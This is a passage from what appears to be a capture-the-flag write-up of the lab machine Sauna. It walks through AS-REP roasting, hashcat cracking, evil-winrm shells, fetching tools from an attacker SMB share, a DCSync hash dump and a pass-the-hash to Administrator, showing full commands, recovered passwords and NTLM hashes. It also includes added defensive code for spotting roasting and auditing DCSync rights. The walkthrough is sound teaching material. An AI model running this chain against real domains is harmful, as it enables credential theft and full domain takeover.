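2022-03-28T02:51:27|s.fergus|10.10.14.4|0x6|-|0xffffffff
2022-03-28T02:51:28|fergus.s|10.10.14.4|0x6|-|0xffffffff
2022-03-28T03:02:50|fsmith|10.10.14.4|0x0|0|0x17
2022-03-28T03:05:00|svc_loanmgr|10.10.10.175|0x0|2|0x12
2022-03-28T03:06:00|nosuchuser|10.10.10.175|0x6|-|0xffffffff
"""

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested name does not exist
PREAUTH_NONE = "0"                    # "Logon without Pre-Authentication"
ETYPE_RC4_HMAC = "0x17"               # etype 23, the $krb5asrep$23$ format above


def parse_4768(text):
    """Split the flattened records into dicts, normalising hex fields to lowercase."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, status, preauth, etype = line.split("|")
        records.append({"ts": ts, "user": user, "ip": ip,
                        "status": status.lower(), "preauth": preauth, "etype": etype.lower()})
    return records


def detect_user_enumeration(records, threshold=5):
    """Source IPs that requested TGTs for at least `threshold` distinct non-existent
    usernames. The threshold is this example's choice; tune it to your environment."""
    unknown_by_ip = defaultdict(set)
    for r in records:
        if r["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown_by_ip[r["ip"]].add(r["user"])
    return {ip: sorted(users) for ip, users in unknown_by_ip.items() if len(users) >= threshold}


def detect_asrep_roast(records):
    """Successful TGT requests that skipped pre-authentication. Any such request
    hands out a crackable AS-REP; RC4 (0x17) is the cheapest to crack, as seen above."""
    return [(r["user"], r["ip"], r["etype"]) for r in records
            if r["status"] == "0x0" and r["preauth"] == PREAUTH_NONE]


if __name__ == "__main__":
    recs = parse_4768(SAMPLE_4768)
    for ip, users in detect_user_enumeration(recs).items():
        print(f"possible username enumeration from {ip}: {len(users)} unknown names")
    for user, ip, etype in detect_asrep_roast(recs):
        rc4 = " (RC4, weakest)" if etype == ETYPE_RC4_HMAC else ""
        print(f"AS-REP without pre-auth for {user} from {ip}, etype {etype}{rc4}")
```

The single stray 0x6 from 10.10.10.175 stays below the threshold, while the seven guesses from 10.10.14.4 are reported, and only fsmith's no-pre-auth request is flagged as a roast; svc_loanmgr's normal AES request (pre-auth type 2) is not.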

Let's crack the AS-REP hash with hashcat (mode 18200),

┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$...' /opt/wordlists/rockyou.txt
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5011bb17971f25a63756ac1d2a$...:Thestrokes23
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:09516b5...878c92
Time.Started.....: Mon Mar 28 12:30:12 2022 (0 secs)
Time.Estimated...: Mon Mar 28 12:30:12 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14487.9 kH/s (4.82ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 59c Util: 33% Core:2032MHz Mem:6000MHz Bus:4

Started: Mon Mar 28 12:30:10 2022
Stopped: Mon Mar 28 12:30:13 2022

The password for the user fsmith is Thestrokes23

Now let's list all AS-REP roastable users using fsmith's credentials,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetNPUsers egotistical-bank.local/fsmith:Thestrokes23  -dc-ip 10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Name    MemberOf                                                            PasswordLastSet             LastLogon                   UAC      
------  ------------------------------------------------------------------  --------------------------  --------------------------  --------
FSmith  CN=Remote Management Users,CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL  2020-01-23 11:45:19.047096  2022-03-28 10:02:50.823048  0x410200 

There is none other than fsmith
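The UAC column in the GetNPUsers output, 0x410200, is the userAccountControl bitmask that makes FSmith roastable. As an added example (not from the writeup), the following decodes that value into its documented flag names and builds the LDAP filter an administrator can run to find every account with pre-authentication disabled; the flag constants are the standard ADS_USER_FLAG values and the matching-rule OID 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND.

```python
# Added example (not from the original writeup): decode the userAccountControl
# value printed in the UAC column above and build an audit filter for the flag
# that enables AS-REP roasting. Constants are the documented ADS_USER_FLAG bits.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQ_PREAUTH = 0x400000

# LDAP_MATCHING_RULE_BIT_AND (1.2.840.113556.1.4.803) matches when the given bit is
# set; the filter needs the bit as a decimal value.
PREAUTH_AUDIT_FILTER = (
    f"(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)


def parse_uac(text):
    """Accept the hex form tools print ('0x410200') or a decimal LDAP value."""
    text = text.strip()
    return int(text, 16) if text.lower().startswith("0x") else int(text)


def decode_uac(value):
    """Names of the set flags, lowest bit first; bits not in the table are reported as hex."""
    names = [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]
    leftover = value & ~sum(UAC_FLAGS)
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:x})")
    return names


def preauth_disabled(value):
    """True when the account can be AS-REP roasted."""
    return bool(value & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    uac = parse_uac("0x410200")  # FSmith's value from the GetNPUsers output
    print(hex(uac), decode_uac(uac), "roastable" if preauth_disabled(uac) else "ok")
    print("audit filter:", PREAUTH_AUDIT_FILTER)
```

0x410200 decodes to NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD and DONT_REQ_PREAUTH, which is exactly why GetNPUsers returned a hash for this account and no other; the same filter string can be passed to ldapsearch with the -b base used earlier on this page.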

Now let's use fsmith's credentials to spawn a shell with evil-winrm,

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u fsmith -p Thestrokes23 -i 10.10.10.175                                

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> hostname
SAUNA

Grabbing the user flag,

*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
<USER FLAG>

Privilege Enumeration

Checking for privileges assigned to our user,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Checking the group membership of our user,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Looking for other users in this domain,

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr
The command completed with one or more errors.

HSmith and svc_loanmgr might be potential targets

Starting an SMB share on my local machine to transfer scripts for post-exploitation,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-smbserver MONISH SMBShare/ -smb2support           
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Let's run PowerUp.ps1 to check for privilege escalation vectors,

*Evil-WinRM* PS C:\Users\FSmith> copy \\10.10.14.4\MONISH\PowerUp.ps1 .
*Evil-WinRM* PS C:\Users\FSmith> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\FSmith>
*Evil-WinRM* PS C:\Users\FSmith> . ./PowerUp.ps1
*Evil-WinRM* PS C:\Users\FSmith> Invoke-AllChecks

[*] Running Invoke-AllChecks


[*] Checking if user is in a local group with administrative privileges...


[*] Checking for unquoted service paths...
Access denied 
At C:\Users\FSmith\PowerUp.ps1:1451 char:21
+     $VulnServices = Get-WmiObject -Class win32_service | Where-Object ...
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service executable and argument permissions...
Access denied 
At C:\Users\FSmith\PowerUp.ps1:1504 char:5
+     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pat ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-WmiObject], ManagementException
    + FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand


[*] Checking service permissions...
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At C:\Users\FSmith\PowerUp.ps1:1555 char:5
+     Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeCo ...
+     ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand


[*] Checking %PATH% for potentially hijackable DLL locations...


ModifiablePath    : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
IdentityReference : EGOTISTICALBANK\FSmith
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'





[*] Checking for AlwaysInstallElevated registry key...


[*] Checking for Autologon credentials in registry...


[*] Checking for modifidable registry autoruns and configs...


[*] Checking for modifiable schtask files/configs...


[*] Checking for unattended install files...


[*] Checking for encrypted web.config strings...


[*] Checking for encrypted application pool and virtual directory passwords...


[*] Checking for plaintext passwords in McAfee SiteList.xml files....



[*] Checking for cached Group Policy Preferences .xml files....

*Evil-WinRM* PS C:\Users\FSmith> 

No potential vectors for privilege escalation were found with PowerUp.ps1

We can also try winPEAS and Watson to look for sensitive information or known CVEs,

*Evil-WinRM* PS C:\Users\FSmith> copy 20220328072842_BloodHound.zip \\10.10.14.4\MONISH\
*Evil-WinRM* PS C:\Users\FSmith> copy \\10.10.14.4\MONISH\winPEASany.exe .
*Evil-WinRM* PS C:\Users\FSmith> .\winPEASany.exe log=scan.txt
"log" argument present, redirecting output to file "scan.txt"
*Evil-WinRM* PS C:\Users\FSmith> copy scan.txt \\10.10.14.4\MONISH\

Let's analyse the scan result,

┌──(kaliaidenpearce369)-[~/SMBShare]
└─$ cat scan.txt

...

╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

...

Lateral Movement - svc_loanmgr

From the credentials above we can see that the DefaultUserName is EGOTISTICALBANK\svc_loanmanager, but we need the SAM account name to log in

From the net user output we can see that the SAM account name is svc_loanmgr

Now that we have the autologon credentials for EGOTISTICALBANK\svc_loanmanager, let's use them to get a shell with evil-winrm,

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i 10.10.10.175

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> hostname
SAUNA

The privileges and group membership of this user are the same as the previous user's,

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Running PowerUp.ps1/winPEAS etc. again as this user is going to give us almost the same output.

We need an alternate approach, so let's use SharpHound.

Running SharpHound

Let's run the SharpHound ingestor and view the output in BloodHound,

*Evil-WinRM* PS C:\Users\svc_loanmgr> copy \\10.10.14.4\MONISH\SharpHound.exe .
*Evil-WinRM* PS C:\Users\svc_loanmgr> .\SharpHound.exe --collectionmethods all
2022-03-28T07:54:10.8543028-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-28T07:54:10.8543028-07:00|INFORMATION|Initializing SharpHound at 7:54 AM on 3/28/2022
2022-03-28T07:54:35.0574370-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-03-28T07:54:35.2136896-07:00|INFORMATION|Beginning LDAP search for EGOTISTICAL-BANK.LOCAL
2022-03-28T07:54:35.2449526-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-03-28T07:54:35.2449526-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-03-28T07:55:05.6511961-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2022-03-28T07:55:34.0261756-07:00|INFORMATION|Consumers finished, closing output channel
2022-03-28T07:55:34.0574273-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-03-28T07:55:34.2918182-07:00|INFORMATION|Status: 94 objects finished (+94 1.59322)/s -- Using 57 MB RAM
2022-03-28T07:55:34.2918182-07:00|INFORMATION|Enumeration finished in 00:00:59.0988141
2022-03-28T07:55:34.4169036-07:00|INFORMATION|SharpHound Enumeration Completed at 7:55 AM on 3/28/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc_loanmgr> ls


    Directory: C:\Users\svc_loanmgr


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        9/15/2018  12:19 AM                Desktop
d-r---        1/25/2020   1:04 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos
-a----        3/28/2022   7:55 AM          11205 20220328075533_BloodHound.zip
-a----        3/27/2022   3:51 AM         906752 SharpHound.exe
-a----        3/28/2022   7:55 AM           8720 ZDFkMDEyYjYtMmE1ZS00YmY3LTk0OWItYTM2OWVmMjc5NDVk.bin


*Evil-WinRM* PS C:\Users\svc_loanmgr> copy 20220328075533_BloodHound.zip \\10.10.14.4\MONISH\

Seems like my SharpHound didn't collect user data here, tried many times but same result.

Getting the SID (Security Identifier) of the current user,

*Evil-WinRM* PS C:\Users\svc_loanmgr> whoami /user

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108

Let's load the zip in BloodHound to analyse the AD domain.

Looks like this user has two ACLs on the domain object itself.

These are replication rights, so from this user we can perform a DCSync attack to dump all hashes.

DCSync Attack

Since this user has the privileges needed for a DCSync attack, let's dump all hashes.

┌──(kaliaidenpearce369)-[~]
└─$ impacket-secretsdump svc_loanmgr:'Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:25ec45dec42602d1e60fb0efa6de3807:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:47b1e9c0ea3f044a46d4503cd259fecf091d221b96c0d85127b0a27c74cfdf6f
SAUNA$:aes128-cts-hmac-sha1-96:ad5380ae69f55279f536d4e7a1439528
SAUNA$:des-cbc-md5:e6945843a4a43458
[*] Cleaning up...

Now we have every hash in the domain, which amounts to a full domain takeover.
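From the defender's side, the two things to control here are who holds the replication rights BloodHound surfaced on the domain object, and whether a non-DC account actually exercises them. The script below is an added example (not from the original writeup): it lists the ACEs on the domain root that grant DCSync-capable extended rights and hunts Security event 4662 for their use. It assumes it runs on a DC with the ActiveDirectory RSAT module and with "Audit Directory Service Access" (success) enabled, otherwise 4662 is not logged.

```powershell
# Added example: audit DCSync rights on the domain object and hunt 4662 events.
Import-Module ActiveDirectory

# Extended rights that together allow replicating secrets out of NTDS (DCSync).
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-DCSyncPrincipals {
    # Every Allow ACE on the domain root that grants one of the replication rights.
    # Expect only Domain Controllers, Enterprise DCs, Administrators and, if present,
    # the Azure AD Connect account; anything else (like a loan-manager service
    # account) is a finding.
    $domainDN = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$domainDN"
    foreach ($ace in $acl.Access) {
        $guid = $ace.ObjectType.Guid
        if ($ace.AccessControlType -eq 'Allow' -and $ReplicationRights.ContainsKey($guid)) {
            [pscustomobject]@{
                Principal = $ace.IdentityReference.Value
                Right     = $ReplicationRights[$guid]
                Inherited = $ace.IsInherited
            }
        }
    }
}

function Find-DCSyncEvents {
    # 4662 events in which a principal other than a DC computer account used a
    # replication right. DC accounts end in '$' and replicate legitimately.
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $used = $ReplicationRights.Keys | Where-Object { $data['Properties'] -match $_ }
        if ($used -and $data['SubjectUserName'] -notmatch '\$$') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Subject = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                Rights  = ($used | ForEach-Object { $ReplicationRights[$_] }) -join ', '
            }
        }
    }
}

Get-DCSyncPrincipals | Format-Table -AutoSize
Find-DCSyncEvents -Hours 24 | Format-Table -AutoSize
```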

Lateral Movement - Administrator

Since we have the NTLM hash of the Administrator account, we can simply perform a Pass-the-Hash attack to gain access,

Using impacket-wmiexec for the PTH attack,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-wmiexec EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
egotisticalbank\administrator

C:\>hostname
SAUNA

C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>more root.txt
<ROOT FLAG>

C:\Users\Administrator\Desktop>

We could equally use impacket-psexec or impacket-smbexec; the choice is ours.